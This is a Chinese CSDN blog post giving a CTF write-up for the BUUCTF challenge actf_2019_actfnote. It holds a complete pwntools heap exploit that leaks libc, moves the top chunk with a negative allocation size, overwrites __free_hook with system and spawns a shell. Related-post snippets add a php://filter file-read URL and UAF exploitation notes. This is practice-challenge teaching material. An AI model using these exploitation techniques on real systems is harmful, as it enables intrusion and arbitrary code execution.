actf_2019_actfnote

最新推荐文章于 2023-06-18 19:18:34 发布
最新推荐文章于 2023-06-18 19:18:34 发布
阅读量567 收藏
点赞数
分类专栏: 题目 BUUCTF 文章标签: pwn ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/106911963
版权

思路

通过溢出将topchunk的位置向上提然后申请堆块即可完成一次任意地址写入
exp:

#!/usr/bin/python2
from pwn import *
#p=process('./ACTF_2019_ACTFNOTE')
p=remote('node3.buuoj.cn',26474)
elf=ELF('./ACTF_2019_ACTFNOTE')
libc=elf.libc

def add(size,name,content):
	p.sendlineafter('$ ','1')
	p.sendlineafter(': ',str(size))
	p.sendafter(': ',name)
	p.sendafter(': ',content)

def Tadd(size):
	p.sendlineafter('$ ','1')
	p.sendlineafter(': ',str(size))

def edit(idx,content):
	p.sendlineafter('$ ','2')
	p.sendlineafter(': ',str(idx))
	p.sendafter(': ',content)

def delete(idx):
	p.sendlineafter('$ ','3')
	p.sendlineafter(': ',str(idx))

def show(idx):
	p.sendlineafter('$ ','4')
	p.sendlineafter(': ',str(idx))
add(0x18,'c'*0x17+'\n','c'*4)
add(0x18,'\x00'*0x18,'d'*0x19)
add(0x18,'\x01'*0x18,'c'*4)
show(1)
libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x8e364
log.success('libcbase: '+hex(libcbase))
system=libcbase+libc.sym['system']
free_hook=libcbase+libc.sym['__free_hook']
edit(2,p64(0)*3+'\xff'*8)
p.sendlineafter('$ ','1')
p.sendlineafter(': ',str(-240))
p.sendafter(': ',p64(free_hook))
edit(1,p64(system))
add(0x18,'aa','/bin/sh\x00')#4
delete(4)
p.interactive()
doudoudedi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ACTF题解
qq_41788704的博客
10-13 878
Include 查看HTML源码,发现flag位置 因为题目提示,所以用伪协议包含文件 http://e4ca9c95-59dc-4e4f-8e08-99bbf23306dd.node3.buuoj.cn/?file=php://filter/read=convert.base64-encode/resource=flag.php exec backupfile 扫描发现index.php.bak源码泄露 <?php include_once "flag.php"; if(isset($_GE
光立方888 573 2803程序
06-14
光立方是一种创新的LED显示技术,它通过三维立体排列的LED灯珠,形成一个透明、可编程的灯光展示装置。这种技术广泛应用于艺术展览、舞台效果、广告展示等领域,因其独特的视觉效果和高度的可定制性而备受青睐。...
ACTF_2019_ACTFNOTE(top chunk上移)
seaaseesa的博客
07-01 843
ACTF_2019_ACTFNOTE 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,edit里存在溢出,可以直接修改top chunk的size 那么只需要把top chunk的size修改为-1,然后malloc(负数)即可将TOP chunk向前移动与已有的chunk重叠,然后通过申请空间,控制该程序结构体的指针即可实现任意地址读写。 #coding:utf8 from pwn import * #sh = process('./ACTF_2019_ACTFNOTE')
actf_2019_message
kjdfklha的博客
08-26 306
BUU actf_2019_message double free/tcache dup
BUUCTF-----actf_2019_babyheap (UAF)
半岛铁盒的博客
06-15 6205
这道题和之前做的 hitcontraining_uaf 这道题类似 64位程序,没开PIE 并且这里发现了 bin/sh 字符串
actf_2019_babyheap
z1r0的博客
02-16 678
actf_2019_babyheap 查看保护 这里有一个uaf。 这里的堆块还创建一个指向show的地址。 攻击思路: 因为有show的地址,还有uaf。所以可以通过uaf来修改show的地址为system_plt。创建两个0x31大小的堆,此时释放掉再申请两个0x21大小的堆,这个时候就是调用其余一个存放功能的堆块,再加上uaf的存在,将show功能的堆块改为system,将存放conext的功能改到binsh那里,此时调用另一个堆块就相当于调用system("/bin/sh"); from pw
matlab的90个实例.rar_actf8x_matlab基础知识的90个实例
09-24
MATLAB(Matrix Laboratory)是一种强大的数学计算软件,广泛应用于工程计算、数据分析、算法开发和图形化界面构建等领域。本资源“matlab的90个实例.rar”提供了MATLAB的基础知识,通过90个实例帮助初学者掌握其...
潞安矿区高河井田构造样式探讨
06-24
高河井田位于沁水块坳东南部,主要含煤地层包括二叠系下统山西组和石炭系上统太原组,构造要素走向总体为近SN—NNE向。通过对高河井田构造的系统分析,划分了两大类三亚类主要构造样式,并结合实例分析了各种构造样式对...
NTFS文件系统分析
09-19
NTFS文件系统分析,比较详细的介绍,各个元文件的定义,偏移
Jeopardy-Writeups:SniperOJ的CTF挑战比赛
05-18
SniperOJ的挑战文章和源代码描述平台...─ pwn│ ├── pwn100-bof-x86-64│ ├── pwn100-shellcode-x86-64│ ├── pwn150-static-x86-64│ ├── pwn200-actf-run-circles│ ├── pwn200-shorter-shellc
noxctf2018_grocery_list&&actf_2019_message
doudoudedi
03-17 515
noxctf2018_grocery_list 先是观察函数发现有一个可以泄露栈地址然后通过tcache attack打到栈上泄露libcbase然后再次写入free_hook拿到shell exp: #!/usr/bin/python2 from pwn import * #p=process('./GroceryList') p=remote('node3.buuoj.cn',26988) e...
BUUCTF-PWN-ACTF_2019_message
Rt1Text的博客
07-17 227
除了PIE,其它保护全开,规矩的堆菜单。
pwn—actf_2019_message(转载)
INK
08-26 193
pwn
buuctf ACTF_2019_message(tcache bin dup / fastbin dup)
qq_36918532的博客
04-19 750
有些图片显示不出来,我懒的在复制粘贴了,可以直接去我笔记里面看 网上的这道题的,大部分的exp都是写的16.04,使用的fastbin double free,但是在buuctf上根本打不通,因为人家都要求了是18.04,,所以这里写了两个版本(均可以打通) buuctf ACTF_2019_message 安全检查:FULL RELRO(got表不可写),GS,NX都开了 菜单题(堆的) 增加函数:判断当前堆指针是否为空,为空就创建 删除函数:一是没有判断该地方是否有值,而是没有将堆指针置空,可能出
actf_2019_babyheap题解析
qq_29317353的博客
06-18 266
再次创建一个0x10大小的堆块,会从fastbin里面拿出一个0x10大小的堆块就是index3会覆盖掉index0的地址根据malloc的分配机制,所以把函数的指针改为system把content的指针改成/bin/sh就完成了UAF漏洞利用的一个过程。struct chunk是0x10的堆结构体,content chunk是用来存放数据的。查看printf_out,发现利用点。思路创键3给堆块,大小相同,防止合并。由于是UAF漏洞先看,free。看看分配堆块的地方,看注释。mian函数分析,见注释。
actf_2019_babyheap(uaf)
m0_51251108的博客
11-05 275
actf_2019_babyheap: 一般有时间的就有system 逆向分析:
actf_2019_babystack
z1r0的博客
12-31 1314
actf_2019_babystack 查看保护 溢出0x10个字节,大小不够。栈迁移,s的地址都给了,将payload写入s,改ebp和ret为s地址和leave_ret即可。payload前加8个a让rip成功跳转到payload。 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node
ACTF writeup
王意林的专栏
05-07 8807
写在前面:     周末参加了浙大和安恒举办的ACTF,以下是一部分题目的解题思路。 crypto 100 密文: oivqmqgn, yja vibem naarn yi yxbo sqnyab yjqo q zixuea is gaqbn qdi. ykra jqn zira yi baseazy yjqy qeni ko yja ujbqzw rqdqhkoa
ACTF gogogo
最新发布
09-06
ACTF是指Attack and Defense CTF,是一种网络安全竞赛形式。在ACTF比赛中,参赛队伍需要在规定的时间内攻击对手的系统并保护自己的系统免受攻击。参赛队伍需要在攻防过程中发现漏洞、修补漏洞、攻击对手并保护自己的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值